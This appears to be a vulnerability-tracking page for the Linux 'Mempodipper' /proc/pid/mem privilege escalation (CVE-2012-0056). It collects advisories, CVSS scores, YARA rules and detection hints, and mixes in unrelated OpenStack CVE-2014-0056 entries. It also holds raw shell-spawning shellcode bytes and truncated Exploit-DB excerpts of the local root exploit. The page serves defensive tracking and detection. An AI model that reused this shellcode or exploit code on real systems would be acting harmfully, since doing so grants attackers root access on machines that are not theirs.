CVE-2012-0056
published 2012-01-27CVE-2012-0056: The mem_write function in the Linux kernel before 3.2.2, when ASLR is disabled, does not properly check permissions when writing to /proc//mem, which allows…
PriorityP179medium6.9CVSS 2.0
AVLACMAuNCCICAC
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
10.90%
95.3th percentile
The mem_write function in the Linux kernel before 3.2.2, when ASLR is disabled, does not properly check permissions when writing to /proc//mem, which allows local users to gain privileges by modifying process memory, as demonstrated by Mempodipper.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| linux | linux_kernel | >= 0 < 3.11.0-12.19 | 3.11.0-12.19 |
| linux | linux_kernel | >= 0 < 4.2.0-16.19 | 4.2.0-16.19 |
| linux | linux_kernel | >= 2.6.39 < 3.0.18 | 3.0.18 |
| linux | linux_kernel | >= 3.1 < 3.2.2 | 3.2.2 |
| openstack | neutron | >= 2012.2 < 2013.2.3 | 2013.2.3 |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
31 db b0 17 cd 80 31 db b0 2e cd 80 31 c9 b3 06 b1 02 b0 3f cd 80 31 c0 50 68 6e 2f 73 68 68 2f 2f 62 69 89 e3 31 d2 66 ba 2d 69 52 89 e0 31 d2 52 50 53 89 e1 31 d2 31 c0 b0 0b cd 80
bytes↗
48 31 ff b0 69 0f 05 48 31 ff b0 6a 0f 05 40 b7 06 40 b6 02 b0 21 0f 05 48 bb 2f 2f 62 69 6e 2f 73 68 48 c1 eb 08 53 48 89 e7 48 31 db 66 bb 2d 69 53 48 89 e1 48 31 c0 50 51 57 48 89 e6 48 31 d2 b0 3b 0f 05
yara↗
rule Linux_Exploit_CVE_2012_0056_b39839f4 {
meta:
author = "Elastic Security"
id = "b39839f4-e6f4-44bd-a636-ce355f3c5c6a"
fingerprint = "f269c4aecbb55e24d9081d7a1e4bd6cfa9799409b3a3d7a6f9bf127f7468dedc"
creation_date = "2021-01-12"
last_modified = "2021-09-16"
threat_name = "Linux.Exploit.CVE-2012-0056"
reference_sample = "cf569647759e011ff31d8626cea65ed506e8d0ef1d26f3bbb7c02a4060ce58dc"
severity = 100
arch_context = "x86"
scan_context = "file, memory"
license = "Elastic License v2"
os = "linux"
strings:
$a = { 08 02 7E 3E 8B 45 0C 83 C0 04 8B 00 0F B6 00 3C 2D 75 2F 8B }
condition:
all of them
}- →Monitor for open() calls with O_RDWR on /proc/[pid]/mem by a process that is not the target process owner — this is the core exploitation primitive used by Mempodipper. ↗
- →Detect creation of a Unix domain socket at /tmp/.sockpuppet, used by the exploit for parent-child file descriptor passing. ↗
- →Alert on a process spawning /bin/su with a shellcode string as its first argument (argv[1] containing non-printable bytes), as the exploit passes shellcode directly to execl("/bin/su"). ↗
- →Detect use of ptrace (PTRACE_SYSCALL / PTRACE_SINGLESTEP) against a child /bin/su process to locate the exit@plt address — an unusual ptrace pattern for privilege escalation. ↗
- →Scan process memory and files for the Elastic YARA byte signature { 08 02 7E 3E 8B 45 0C 83 C0 04 8B 00 0F B6 00 3C 2D 75 2F 8B } associated with the Mempodipper exploit binary. ↗
- →Detect lseek64 followed by write on /proc/[ppid]/mem from a child process — the exploit seeks to the target offset in parent memory before writing shellcode. ↗
- ·The vulnerability is only exploitable when ASLR is disabled; systems with ASLR enabled are not affected by this specific attack path. ↗
- ·Red Hat Enterprise Linux 4 and 5 are not affected because they did not backport upstream commit 198214a7ee, which introduced the vulnerable code path. ↗
CVSS provenance
nvdv2.06.9MEDIUMAV:L/AC:M/Au:N/C:C/I:C/A:C
osv6.9MEDIUM
vulncheck6.9MEDIUM
vendor_redhat6.9MEDIUM
vendor_ubuntu5.5MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
openstack-neutron: insufficient authorization checks when creating ports
vendor_redhat·2014-03-28·CVSS 2.1
CVE-2014-0056 [LOW] CWE-285 openstack-neutron: insufficient authorization checks when creating ports
openstack-neutron: insufficient authorization checks when creating ports
The l3-agent in OpenStack Neutron 2012.2 before 2013.2.3 does not check the tenant id when creating ports, which allows remote authenticated users to plug ports into the routers of arbitrary tenants via the device id in a port-create command.
Package: openstack-neutron (Red Hat Enterprise Linux OpenStack Platform 5 (Icehouse)) - Not affected
Package: openstack-quantum (Red Hat OpenStack Platform 3) - Will not fix
Ubuntu
Linux kernel (OMAP4) vulnerabilities
vendor_ubuntu·2012-02-13·CVSS 5.5
CVE-2011-4097 [MEDIUM] Linux kernel (OMAP4) vulnerabilities
Title: Linux kernel (OMAP4) vulnerabilities
Summary: Several security issues were fixed in the kernel.
A bug was discovered in the Linux kernel's calculation of OOM (Out of
memory) scores, that would result in the wrong process being killed. A user
could use this to kill the process with the highest OOM score, even if that
process belongs to another user or the system. (CVE-2011-4097)
A flaw was discovered in the XFS filesystem. If a local user mounts a
specially crafted XFS image it could potential execute arbitrary code on
the system. (CVE-2012-0038)
Andy Whitcroft discovered a that the Overlayfs filesystem was not doing the
extended permission checks needed by cgroups and Linux Security Modules
(LSMs). A local user could exploit this to by-pass security policy and
access files that
Ubuntu
Linux kernel (Oneiric backport) vulnerability
vendor_ubuntu·2012-01-26
CVE-2012-0056 Linux kernel (Oneiric backport) vulnerability
Title: Linux kernel (Oneiric backport) vulnerability
Summary: The system could be made to run programs as an administrator.
Jüri Aedla discovered that the kernel incorrectly handled /proc//mem
permissions. A local attacker could exploit this and gain root privileges.
Instructions: After a standard system update you need to reboot your computer to make
all the necessary changes.
Ubuntu
Linux kernel vulnerability
vendor_ubuntu·2012-01-23·CVSS 2.1
CVE-2011-2203 [LOW] Linux kernel vulnerability
Title: Linux kernel vulnerability
Summary: The system could be made to run programs as an administrator.
Clement Lecigne discovered a bug in the HFS filesystem. A local attacker
could exploit this to cause a kernel oops. (CVE-2011-2203)
A bug was discovered in the XFS filesystem's handling of pathnames. A local
attacker could exploit this to crash the system, leading to a denial of
service, or gain root privileges. (CVE-2011-4077)
A flaw was found in how the Linux kernel handles user-defined key types. An
unprivileged local user could exploit this to crash the system.
(CVE-2011-4110)
A flaw was found in the Journaling Block Device (JBD). A local attacker
able to mount ext3 or ext4 file systems could exploit this to crash the
system, leading to a denial of service. (CVE-2011-4132)
Cle
Red Hat
kernel: proc: /proc/<pid>/mem mem_write insufficient permission checking
vendor_redhat·2012-01-18·CVSS 6.9
CVE-2012-0056 [MEDIUM] CWE-863 kernel: proc: /proc/<pid>/mem mem_write insufficient permission checking
kernel: proc: /proc//mem mem_write insufficient permission checking
The mem_write function in the Linux kernel before 3.2.2, when ASLR is disabled, does not properly check permissions when writing to /proc//mem, which allows local users to gain privileges by modifying process memory, as demonstrated by Mempodipper.
Statement: This issue did not affect the version of Linux kernel as shipped with Red Hat Enterprise Linux 4 and 5 as it did not backport the upstream commit 198214a7ee. This has been addressed in Red Hat Enterprise Linux 6 and Red Hat Enterprise MRG via https://rhn.redhat.com/errata/RHSA-2012-0052.html and https://rhn.redhat.com/errata/RHSA-2012-0061.html. For more information, please read https://access.redhat.com/kb/docs/DOC-69129.
Package: kernel (Red Hat Enterprise Linux
GHSA
OpenStack Neutron Improper Authentication vulnerability
ghsa·2022-05-17
CVE-2014-0056 [MEDIUM] CWE-287 OpenStack Neutron Improper Authentication vulnerability
OpenStack Neutron Improper Authentication vulnerability
The l3-agent in OpenStack Neutron 2012.2 before 2013.2.3 does not check the tenant id when creating ports, which allows remote authenticated users to plug ports into the routers of arbitrary tenants via the device id in a port-create command.
GHSA
GHSA-h6ww-x4xv-2vj2: The mem_write function in the Linux kernel before 3
ghsa_unreviewed·2022-05-04
CVE-2012-0056 [MEDIUM] GHSA-h6ww-x4xv-2vj2: The mem_write function in the Linux kernel before 3
The mem_write function in the Linux kernel before 3.2.2, when ASLR is disabled, does not properly check permissions when writing to /proc//mem, which allows local users to gain privileges by modifying process memory, as demonstrated by Mempodipper.
OSV
CVE-2012-0056: The mem_write function in the Linux kernel before 3
osv·2012-01-19·CVSS 6.9
CVE-2012-0056 [MEDIUM] CVE-2012-0056: The mem_write function in the Linux kernel before 3
The mem_write function in the Linux kernel before 3.2.2, when ASLR is disabled, does not properly check permissions when writing to /proc//mem, which allows local users to gain privileges by modifying process memory, as demonstrated by Mempodipper.
VulnCheck
Linux kernel before 3.2.2 Process Memory Modification Vulnerability
vulncheck·2012·CVSS 6.9
CVE-2012-0056 [MEDIUM] Linux kernel before 3.2.2 Process Memory Modification Vulnerability
Linux kernel before 3.2.2 Process Memory Modification Vulnerability
The mem_write function in the Linux kernel before 3.2.2, when ASLR is disabled, does not properly check permissions when writing to /proc//mem, which allows local users to gain privileges by modifying process memory, as demonstrated by Mempodipper.
Affected: Linux Kernel
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.kb.cert.org/vuls/id/470151; https://dl.acm.org/doi/pdf/10.1145/3465481.3465758
Exploit PoC: https://vulncheck.com/xdb/2af87af690ba; https://vulncheck.com/xdb/9e3c0b9449c2; https://vulncheck.com/xdb/7789f7055022
YARA
Linux_Exploit_CVE_2012_0056_b39839f4
yara·CVSS 6.9
CVE-2012-0056 [MEDIUM] Linux_Exploit_CVE_2012_0056_b39839f4
rule Linux_Exploit_CVE_2012_0056_b39839f4 {
meta:
author = "Elastic Security"
id = "b39839f4-e6f4-44bd-a636-ce355f3c5c6a"
fingerprint = "f269c4aecbb55e24d9081d7a1e4bd6cfa9799409b3a3d7a6f9bf127f7468dedc"
creation_date = "2021-01-12"
last_modified = "2021-09-16"
threat_name = "Linux.Exploit.CVE-2012-0056"
reference_sample = "cf569647759e011ff31d8626cea65ed506e8d0ef1d26f3bbb7c02a4060ce58dc"
severity = 100
arch_context = "x86"
scan_context = "file, memory"
license = "Elastic License v2"
os = "linux"
strings:
$a = { 08 02 7E 3E 8B 45 0C 83 C0 04 8B 00 0F B6 00 3C 2D 75 2F 8B }
condition:
all of them
}
YARA
Linux_DirtyCow_Exploit
yara·CVSS 6.9
CVE-2012-0056 [MEDIUM] Linux_DirtyCow_Exploit
rule Linux_DirtyCow_Exploit {
meta:
description = "Detects Linux Dirty Cow Exploit - CVE-2012-0056 and CVE-2016-5195"
author = "Florian Roth"
reference = "http://dirtycow.ninja/"
date = "2016-10-21"
strings:
$a1 = { 48 89 D6 41 B9 00 00 00 00 41 89 C0 B9 02 00 00 00 BA 01 00 00 00 BF 00 00 00 00 }
$b1 = { E8 ?? FC FF FF 48 8B 45 E8 BE 00 00 00 00 48 89 C7 E8 ?? FC FF FF 48 8B 45 F0 BE 00 00 00 00 48 89 }
$b2 = { E8 ?? FC FF FF B8 00 00 00 00 }
$source1 = "madvise(map,100,MADV_DONTNEED);"
$source2 = "=open(\"/proc/self/mem\",O_RDWR);"
$source3 = ",map,SEEK_SET);"
$source_printf1 = "mmap %x"
$source_printf2 = "procselfmem %d"
$source_printf3 = "madvise %d"
$source_printf4 = "[-] failed to patch payload"
$source_printf5 = "[-] failed to win race condition..."
$source_printf6 = "[*] waiting
YARA
Linux_Exploit_CVE_2012_0056_06b2dff5
yara·CVSS 6.9
CVE-2012-0056 [MEDIUM] Linux_Exploit_CVE_2012_0056_06b2dff5
rule Linux_Exploit_CVE_2012_0056_06b2dff5 {
meta:
author = "Elastic Security"
id = "06b2dff5-250a-46e0-b763-8e6b04498fe2"
fingerprint = "82b200deae93c8fa376d670f5091d9a63730a6f5b5e8a0567fe9c283075d57c0"
creation_date = "2021-01-12"
last_modified = "2021-09-16"
threat_name = "Linux.Exploit.CVE-2012-0056"
reference_sample = "168b3fb1c675ab76224c641e228434495160502a738b64172c679e8ce791ac17"
severity = 100
arch_context = "x86"
scan_context = "file, memory"
license = "Elastic License v2"
os = "linux"
strings:
$a = { 20 66 64 20 69 6E 20 70 61 72 65 6E 74 2E 00 5B 2B 5D 20 52 65 63 }
condition:
all of them
}
YARA
Linux_Exploit_CVE_2012_0056_a1e53450
yara·CVSS 6.9
CVE-2012-0056 [MEDIUM] Linux_Exploit_CVE_2012_0056_a1e53450
rule Linux_Exploit_CVE_2012_0056_a1e53450 {
meta:
author = "Elastic Security"
id = "a1e53450-036e-4ae3-bfe4-64a6c7239a04"
fingerprint = "d0a0635fb356ccedb1448082cc63748d49d45f8a25e43eab7ac1d67e87062b8f"
creation_date = "2021-04-06"
last_modified = "2021-09-16"
threat_name = "Linux.Exploit.CVE-2012-0056"
reference_sample = "15a4d149e935758199f6df946ff889e12097f5fec4ef450e9cbd554d1efbd5e6"
severity = 100
arch_context = "x86"
scan_context = "file, memory"
license = "Elastic License v2"
os = "linux"
strings:
$a = { 80 31 C9 B3 ?? B1 02 B0 3F CD 80 31 C0 50 68 6E }
condition:
all of them
}
Exploit-DB
Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Local Privilege Escalation (1)
exploitdb·2012-01-23·CVSS 6.9
CVE-2012-0056 [MEDIUM] Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Local Privilege Escalation (1)
Linux Kernel 2.6.39 =2.6.39, 32-bit and 64-bit
# Date: Jan 21, 2012
# Author: zx2c4
# Tested on: Gentoo, Ubuntu
# Platform: Linux
# Category: Local
# CVE-2012-0056
* Mempodipper
* by zx2c4
*
* Linux Local Root Exploit
*
* Rather than put my write up here, per usual, this time I've put it
* in a rather lengthy blog post: http://blog.zx2c4.com/749
*
* Enjoy.
*
* - zx2c4
* Jan 21, 2012
*
* CVE-2012-0056
*/
#define _LARGEFILE64_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
char *socket_path = "/tmp/.sockpuppet";
int send_fd(int fd)
{
char buf[1];
struct iovec iov;
struct msghdr msg;
struct cmsghdr *cmsg;
struct sockaddr_un addr;
int n;
int sock;
char cms[CMSG_SPACE(sizeof(int))];
if ((sock = socket(AF_UNIX, SOCK_STREAM, 0)) cmsg_len = CMS
Exploit-DB
Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Local Privilege Escalation (2)
exploitdb·2012-01-12·CVSS 6.9
CVE-2012-0056 [MEDIUM] Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Local Privilege Escalation (2)
Linux Kernel 2.6.39
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
char *prog_name;
int send_fd(int sock, int fd)
{
char buf[1];
struct iovec iov;
struct msghdr msg;
struct cmsghdr *cmsg;
int n;
char cms[CMSG_SPACE(sizeof(int))];
buf[0] = 0;
iov.iov_base = buf;
iov.iov_len = 1;
memset(&msg, 0, sizeof msg);
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
msg.msg_control = (caddr_t)cms;
msg.msg_controllen = CMSG_LEN(sizeof(int));
cmsg = CMSG_FIRSTHDR(&msg);
cmsg->cmsg_len = CMSG_LEN(sizeof(int));
cmsg->cmsg_level = SOL_SOCKET;
cmsg->cmsg_type = SCM_RIGHTS;
memmove(CMSG_DATA(cmsg), &fd, sizeof(int));
if ((n = sendmsg(sock, &msg, 0)) != iov.iov_len)
return -1;
close(sock);
return 0;
}
int recv_fd(int sock)
{
int n;
i
Bugzilla
CVE-2014-0056 openstack-neutron: insufficient authorization checks when creating ports
bugzilla·2014-02-10·CVSS 2.1
CVE-2014-0056 [LOW] CVE-2014-0056 openstack-neutron: insufficient authorization checks when creating ports
CVE-2014-0056 openstack-neutron: insufficient authorization checks when creating ports
The OpenStack project reports:
Title: Routers can be cross plugged by other tenants
Reporter: Aaron Rosen (VMWare)
Products: Neutron
Affects: 2012.2 versions up to 2013.2.2
Description:
Aaron Rosen from VMWare reported a vulnerability where Neutron fails to
perform proper authorization checks when creating ports. By choosing a
device id of a router from a different tenant when creating a port, an
authenticated user can access the network of other tenants. This affects
deployments of Neutron using plugins relying on the l3-agent.
Discussion:
Acknowledgements:
Red Hat would like to thank the OpenStack project for reporting this issue. Upstream acknowledges Aaron Rosen from VMware as the original repo
Bugzilla
CVE-2012-0056 kernel: proc: /proc/<pid>/mem mem_write insufficient permission checking [fedora-all]
bugzilla·2012-01-18·CVSS 6.9
CVE-2012-0056 [MEDIUM] CVE-2012-0056 kernel: proc: /proc/<pid>/mem mem_write insufficient permission checking [fedora-all]
CVE-2012-0056 kernel: proc: /proc//mem mem_write insufficient permission checking [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected Fedora
versions.
For comments that are specific to the vulnerability please use bugs filed
against "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please include this bug ID and the
bug IDs of this bug's parent bugs filed against the "Security Response"
product (the top-level CVE bugs). Please mention the CVE IDs being fixed
in the RPM changelog when available.
Bodhi update submission link:
https://admin.fedoraproject.org/updates/
Bugzilla
CVE-2012-0056 kernel: proc: /proc/<pid>/mem mem_write insufficient permission checking
bugzilla·2012-01-18·CVSS 6.9
CVE-2012-0056 [MEDIUM] CVE-2012-0056 kernel: proc: /proc/<pid>/mem mem_write insufficient permission checking
CVE-2012-0056 kernel: proc: /proc//mem mem_write insufficient permission checking
From Linus' patch:
"Jüri Aedla reported that the /proc//mem handling really isn't very robust, and it also doesn't match the permission checking of any of the other related files.
This changes it to do the permission checks at open time, and instead of tracking the process, it tracks the VM at the time of the open. That simplifies the code a lot, but does mean that if you hold the file descriptor open over an execve(), you'll continue to read from the _old_ VM."
A local, unprivileged user could use this flaw to escalate their privileges.
Upstream commit:
http://git.kernel.org/linus/e268337dfe26dfc7efd422a804dbb27977a3cccc
Acknowledgements:
Red Hat would like to thank Jüri Aedla for reporting this issue.
http://blog.zx2c4.com/749http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commitdiff%3Bh=e268337dfe26dfc7efd422a804dbb27977a3cccchttp://secunia.com/advisories/47708http://ubuntu.com/usn/usn-1336-1http://www.kb.cert.org/vuls/id/470151http://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.2.2http://www.openwall.com/lists/oss-security/2012/01/18/1http://www.openwall.com/lists/oss-security/2012/01/18/2http://www.openwall.com/lists/oss-security/2012/01/19/4http://www.openwall.com/lists/oss-security/2012/01/22/4http://www.redhat.com/support/errata/RHSA-2012-0052.htmlhttp://www.redhat.com/support/errata/RHSA-2012-0061.htmlhttp://www.securityfocus.com/bid/51625https://bugzilla.redhat.com/show_bug.cgi?id=782642http://blog.zx2c4.com/749http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commitdiff%3Bh=e268337dfe26dfc7efd422a804dbb27977a3cccchttp://secunia.com/advisories/47708http://ubuntu.com/usn/usn-1336-1http://www.kb.cert.org/vuls/id/470151http://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.2.2http://www.openwall.com/lists/oss-security/2012/01/18/1http://www.openwall.com/lists/oss-security/2012/01/18/2http://www.openwall.com/lists/oss-security/2012/01/19/4http://www.openwall.com/lists/oss-security/2012/01/22/4http://www.redhat.com/support/errata/RHSA-2012-0052.htmlhttp://www.redhat.com/support/errata/RHSA-2012-0061.htmlhttp://www.securityfocus.com/bid/51625https://bugzilla.redhat.com/show_bug.cgi?id=782642
2012-01-27
Published
Exploited in the wild